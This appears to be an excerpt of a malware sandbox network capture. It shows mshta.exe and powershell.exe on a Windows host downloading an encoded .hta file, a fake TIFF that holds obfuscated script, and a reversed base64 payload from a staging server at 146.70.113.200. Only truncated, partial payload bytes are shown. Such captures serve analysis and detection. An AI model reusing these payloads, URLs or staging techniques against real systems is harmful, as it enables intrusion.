                                                  Dec 2, 2024 07:24:37.155756950 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                  Dec 2, 2024 07:24:37.155941963 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                  Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25252C%252509%252509%252509%252509%252509%252509%2
                                                  Dec 2, 2024 07:24:37.155952930 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                  Dec 2, 2024 07:24:37.155968904 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252563%252564%252543%25254C%252552%25256F%25257A%252573%252549%25254D%252542%25
                                                  Dec 2, 2024 07:24:37.275677919 CET1236INData Raw: 35 32 35 34 36 25 32 35 32 35 37 33 25 32 35 32 35 34 32 25 32 35 32 35 36 39 25 32 35 32 35 37 35 25 32 35 32 35 37 30 25 32 35 32 35 36 34 25 32 35 32 35 34 43 25 32 35 32 35 37 41 25 32 35 32 35 36 31 25 32 35 32 35 36 44 25 32 35 32 35 34 37
                                                  Data Ascii: 52546%252573%252542%252569%252575%252570%252564%25254C%25257A%252561%25256D%252547%252553%252555%252553%25256C%252565%252541%252570%252566%252552%25256C%252548%252562%252542%252561%252553%25254F%252571%25254D%252541%252541%252571%252578%252542


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.2249164146.70.113.200803684C:\Windows\System32\mshta.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:24:40.512866020 CET436OUTGET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Range: bytes=8896-
                                                  Connection: Keep-Alive
                                                  Host: 146.70.113.200
                                                  If-Range: "26ee1-62840224d2d3d"
                                                  Dec 2, 2024 07:24:42.088551044 CET1236INHTTP/1.1 206 Partial Content
                                                  Date: Mon, 02 Dec 2024 06:24:41 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 150561
                                                  Content-Range: bytes 8896-159456/159457
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/hta
                                                  Data Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 [TRUNCATED]
                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                  Dec 2, 2024 07:24:42.088572979 CET224INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                  Dec 2, 2024 07:24:42.088582039 CET1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252563%252564%252543%25254C%252552%25256F%252
                                                  Dec 2, 2024 07:24:42.088685036 CET1236INData Raw: 32 35 34 32 25 32 35 32 35 34 35 25 32 35 32 35 34 32 25 32 35 32 35 34 32 25 32 35 32 35 37 37 25 32 35 32 35 34 36 25 32 35 32 35 37 33 25 32 35 32 35 34 32 25 32 35 32 35 36 39 25 32 35 32 35 37 35 25 32 35 32 35 37 30 25 32 35 32 35 36 34 25
                                                  Data Ascii: 2542%252545%252542%252542%252577%252546%252573%252542%252569%252575%252570%252564%25254C%25257A%252561%25256D%252547%252553%252555%252553%25256C%252565%252541%252570%252566%252552%25256C%252548%252562%252542%252561%252553%25254F%252571%25254D%
                                                  Dec 2, 2024 07:24:42.088697910 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                  Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                  Dec 2, 2024 07:24:42.088707924 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                  Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                  Dec 2, 2024 07:24:42.088718891 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                  Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                  Dec 2, 2024 07:24:42.088898897 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                  Dec 2, 2024 07:24:42.088943005 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                  Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                  Dec 2, 2024 07:24:42.088953972 CET1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                  Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                  Dec 2, 2024 07:24:42.208703995 CET1236INData Raw: 32 35 36 38 25 32 35 32 35 36 33 25 32 35 32 35 36 38 25 32 35 32 35 34 31 25 32 35 32 35 35 38 25 32 35 32 35 34 46 25 32 35 32 35 34 42 25 32 35 32 35 35 33 25 32 35 32 35 36 37 25 32 35 32 35 35 35 25 32 35 32 35 34 45 25 32 35 32 35 35 32 25
                                                  Data Ascii: 2568%252563%252568%252541%252558%25254F%25254B%252553%252567%252555%25254E%252552%252562%252550%252573%252571%252556%252575%252569%252579%252565%25256D%25254D%252544%252541%252564%252570%252567%252541%252575%25257A%252567%252552%252544%252549%


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.2249165146.70.113.200803848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:24:47.731422901 CET364OUTGET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:24:49.307605982 CET1236INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:24:48 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:13:29 GMT
                                                  ETag: "25b10-62840183b3eb7"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 154384
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: image/tiff
                                                  Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 51 00 6b 00 69 00 78 00 6d 00 57 00 4f 00 63 00 65 00 4b 00 4f 00 7a 00 61 00 55 00 69 00 20 00 3d 00 20 00 22 00 6a 00 57 00 57 00 4c 00 4e 00 71 00 4c 00 4c 00 5a 00 53 00 54 00 6a 00 4a 00 6e 00 68 00 22 00 0d 00 0a 00 68 00 4e 00 4c 00 57 00 64 00 69 00 6b 00 4c 00 6b 00 6a 00 55 00 70 00 65 00 50 00 4b 00 20 00 3d 00 20 00 22 00 50 00 43 00 6c 00 61 00 68 00 66 00 57 00 4c 00 64 00 7a 00 63 00 47 00 4c 00 4f 00 68 00 22 00 0d 00 0a 00 65 00 61 00 71 00 41 00 71 00 73 00 4b 00 57 00 4b 00 57 00 69 00 65 00 6d 00 68 00 43 00 20 00 3d 00 20 00 22 00 6f 00 4c 00 73 00 4f 00 6b 00 4e 00 41 00 74 00 6b 00 4c 00 4e 00 70 00 67 00 75 00 49 00 22 00 0d 00 0a 00 0d 00 0a 00 71 00 50 00 64 00 50 00 50 00 51 00 6d 00 74 00 78 00 57 00 42 00 52 00 6f 00 4c 00 57 00 20 00 3d 00 20 00 22 00 57 00 66 00 42 00 7a 00 52 00 6c 00 5a 00 63 00 57 00 55 00 4e 00 53 00 41 00 69 00 71 00 22 00 0d 00 0a 00 54 00 55 00 63 00 4e 00 69 00 65 00 4c 00 74 00 55 00 4c 00 [TRUNCATED]
                                                  Data Ascii: QkixmWOceKOzaUi = "jWWLNqLLZSTjJnh"hNLWdikLkjUpePK = "PClahfWLdzcGLOh"eaqAqsKWKWiemhC = "oLsOkNAtkLNpguI"qPdPPQmtxWBRoLW = "WfBzRlZcWUNSAiq"TUcNieLtULzBiOA = "phLNmibONtoeUZP"BWnLtAubLWufcaG = "LcUnhLoknLLZGoT"NJzWWZfxLNWaZhA = "pGNpGCftHLehLKp"cehlPQPtkzSZkAe = "BKNiiKUqcWmBiec"bkovKLhKAPWKLKU = "liGldCfWBcecchz"UAuuBgsRLSQGQLH = "PWLkfKhhWAWgLLZ"uWkeiWiUKLhlWkq = "LWoTKBLQLobcxaG"KpmpKLLmiecivLL = "ZLKOqkfhueLBZQL"ONkCfh
                                                  Dec 2, 2024 07:24:49.307630062 CET1236INData Raw: 00 4e 00 57 00 47 00 75 00 57 00 65 00 4c 00 57 00 54 00 20 00 3d 00 20 00 22 00 6b 00 57 00 4e 00 66 00 70 00 7a 00 4c 00 74 00 4f 00 4b 00 76 00 6c 00 4c 00 65 00 43 00 22 00 0d 00 0a 00 64 00 4b 00 6b 00 74 00 55 00 55 00 47 00 55 00 55 00 4a
                                                  Data Ascii: NWGuWeLWT = "kWNfpzLtOKvlLeC"dKktUUGUUJJZRKU = "LkclfoccZcqbeLW"LriLUaxikmZWmWG = "GkNANzNHGfLCLIL"jkLqRKktmuCLUe
                                                  Dec 2, 2024 07:24:49.307641029 CET1236INData Raw: 00 57 00 57 00 61 00 61 00 4a 00 7a 00 22 00 0d 00 0a 00 66 00 42 00 4b 00 4e 00 5a 00 70 00 5a 00 55 00 68 00 75 00 4e 00 75 00 66 00 69 00 7a 00 20 00 3d 00 20 00 22 00 55 00 66 00 4b 00 6b 00 51 00 41 00 41 00 62 00 4c 00 4c 00 6f 00 48 00 41
                                                  Data Ascii: WWaaJz"fBKNZpZUhuNufiz = "UfKkQAAbLLoHAjp"KUGiWCqWTofGaJU = "oekKcfzeWCBzctj"LLZczeBAeKGoAim = "UAooqLGzGLuLALL"i
                                                  Dec 2, 2024 07:24:49.307806969 CET1236INData Raw: 00 72 00 6f 00 20 00 3d 00 20 00 22 00 65 00 50 00 6b 00 6d 00 47 00 5a 00 52 00 63 00 63 00 6e 00 75 00 67 00 48 00 61 00 57 00 22 00 0d 00 0a 00 68 00 65 00 6e 00 54 00 55 00 4c 00 78 00 61 00 73 00 78 00 43 00 72 00 43 00 57 00 78 00 20 00 3d
                                                  Data Ascii: ro = "ePkmGZRccnugHaW"henTULxasxCrCWx = "KLicLLLaPiAWAkk"OZTPLNGvBhPJkHG = "mLzZpqlHLxfGAhe"LnioGzhZbKmfeiZ = "KBmt
                                                  Dec 2, 2024 07:24:49.307826042 CET1236INData Raw: 00 4c 00 4b 00 4e 00 6e 00 47 00 64 00 66 00 6c 00 6f 00 57 00 7a 00 64 00 4b 00 76 00 55 00 20 00 3d 00 20 00 22 00 6e 00 4a 00 4e 00 4c 00 63 00 6d 00 65 00 43 00 6b 00 5a 00 66 00 6c 00 66 00 61 00 78 00 22 00 0d 00 0a 00 50 00 6d 00 5a 00 57
                                                  Data Ascii: LKNnGdfloWzdKvU = "nJNLcmeCkZflfax"PmZWGNkcbqkILKW = "jbiofmOvfRkLkGG"eiNLGlfjabmZpag = "eJcdALIWePxsaZd"ipesqZlL
                                                  Dec 2, 2024 07:24:49.307836056 CET1236INData Raw: 00 63 00 57 00 75 00 50 00 61 00 53 00 76 00 63 00 4b 00 65 00 57 00 6e 00 22 00 0d 00 0a 00 71 00 69 00 70 00 4c 00 42 00 51 00 66 00 54 00 47 00 48 00 4c 00 74 00 71 00 74 00 55 00 20 00 3d 00 20 00 22 00 55 00 74 00 62 00 63 00 6f 00 4e 00 49
                                                  Data Ascii: cWuPaSvcKeWn"qipLBQfTGHLtqtU = "UtbcoNIpbRHskTc"LmctOzcKicLnctu = "OKWuKignhNNRALg"KAOtmhpUWlniUev = "KpjKLdLduZZGq
                                                  Dec 2, 2024 07:24:49.307847977 CET1236INData Raw: 00 78 00 66 00 4c 00 62 00 68 00 55 00 41 00 4e 00 20 00 3d 00 20 00 22 00 75 00 78 00 41 00 69 00 57 00 72 00 53 00 55 00 50 00 63 00 69 00 61 00 42 00 4e 00 69 00 22 00 0d 00 0a 00 69 00 42 00 6b 00 4a 00 50 00 78 00 75 00 57 00 57 00 4e 00 4b
                                                  Data Ascii: xfLbhUAN = "uxAiWrSUPciaBNi"iBkJPxuWWNKPraR = "gqGjRKpdvGPfLkc"mcKiWZOffKpicpZ = "ZzBWiOZoaopctCt"TOiqQjbhCGhfPNz =
                                                  Dec 2, 2024 07:24:49.308017969 CET1236INData Raw: 00 57 00 63 00 64 00 22 00 0d 00 0a 00 4c 00 61 00 6e 00 4e 00 75 00 6c 00 49 00 57 00 6e 00 53 00 63 00 6e 00 4c 00 66 00 62 00 20 00 3d 00 20 00 22 00 69 00 4f 00 47 00 63 00 57 00 41 00 63 00 69 00 6b 00 41 00 6e 00 57 00 6c 00 73 00 50 00 22
                                                  Data Ascii: Wcd"LanNulIWnScnLfb = "iOGcWAcikAnWlsP"OukxkkuWKNIIiWW = "WWiiihGqoWZWboL"cLiehACLAUWrzGd = "lZZdHQLJkqKLLLn"cG
                                                  Dec 2, 2024 07:24:49.308048964 CET1236INData Raw: 00 3d 00 20 00 22 00 61 00 63 00 47 00 65 00 57 00 4c 00 4b 00 71 00 76 00 49 00 6c 00 55 00 65 00 69 00 65 00 22 00 0d 00 0a 00 63 00 65 00 64 00 6c 00 57 00 65 00 75 00 76 00 4c 00 4c 00 69 00 4c 00 4e 00 6b 00 65 00 20 00 3d 00 20 00 22 00 48
                                                  Data Ascii: = "acGeWLKqvIlUeie"cedlWeuvLLiLNke = "HtWbjHctemAuCho"beOdhkGkWPiKIzu = "CLzmJqGWzhGzPdU"UzZUnsKzhLWkfkO = "LUoLiBf
                                                  Dec 2, 2024 07:24:49.308059931 CET1236INData Raw: 00 47 00 69 00 53 00 47 00 76 00 62 00 6d 00 6d 00 67 00 67 00 6b 00 50 00 69 00 6b 00 20 00 3d 00 20 00 22 00 76 00 47 00 63 00 6e 00 66 00 68 00 75 00 52 00 55 00 6d 00 57 00 4b 00 55 00 5a 00 74 00 22 00 0d 00 0a 00 57 00 78 00 41 00 6d 00 57
                                                  Data Ascii: GiSGvbmmggkPik = "vGcnfhuRUmWKUZt"WxAmWLtckccIOaj = "cUHCWRWKLoHntKP"JiLdPmUjWLbLxGa = "LlukLJUiKLTAbtU"KWckGlvKULo
                                                  Dec 2, 2024 07:24:49.427865028 CET1236INData Raw: 00 43 00 62 00 4f 00 70 00 68 00 69 00 41 00 57 00 4e 00 22 00 0d 00 0a 00 73 00 42 00 6d 00 66 00 4b 00 64 00 6d 00 57 00 4c 00 41 00 4c 00 6d 00 57 00 43 00 69 00 20 00 3d 00 20 00 22 00 47 00 71 00 50 00 50 00 7a 00 69 00 66 00 4b 00 6b 00 55
                                                  Data Ascii: CbOphiAWN"sBmfKdmWLALmWCi = "GqPPzifKkUmSsuG"hepxKRzkUGsLjbA = "GUoiPRLGhliWGec"catZpGWsjCpnRLo = "tqKCptpWsALiWt


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.2249171146.70.113.200801520C:\Windows\System32\mshta.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:25:01.657834053 CET471OUTGET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMT
                                                  Connection: Keep-Alive
                                                  Host: 146.70.113.200
                                                  If-None-Match: "26ee1-62840224d2d3d"
                                                  Dec 2, 2024 07:25:03.187020063 CET275INHTTP/1.1 304 Not Modified
                                                  Date: Mon, 02 Dec 2024 06:25:02 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:16:18 GMT
                                                  ETag: "26ee1-62840224d2d3d"
                                                  Accept-Ranges: bytes
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.2249173146.70.113.200803108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:25:18.217883110 CET79OUTGET /231/ZAHHRZA.txt HTTP/1.1
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:25:19.749361038 CET1236INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:25:19 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:12:20 GMT
                                                  ETag: "5daac-628401412802e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 383660
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain
                                                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Dec 2, 2024 07:25:19.749438047 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEpp7KS2WZxCJ329lGN4VweCLUFW/Wh4luoNd1e5v2hr6Qkz0qTLRVkqBd8KF3WWrSLtEwm4IX7bs4m0
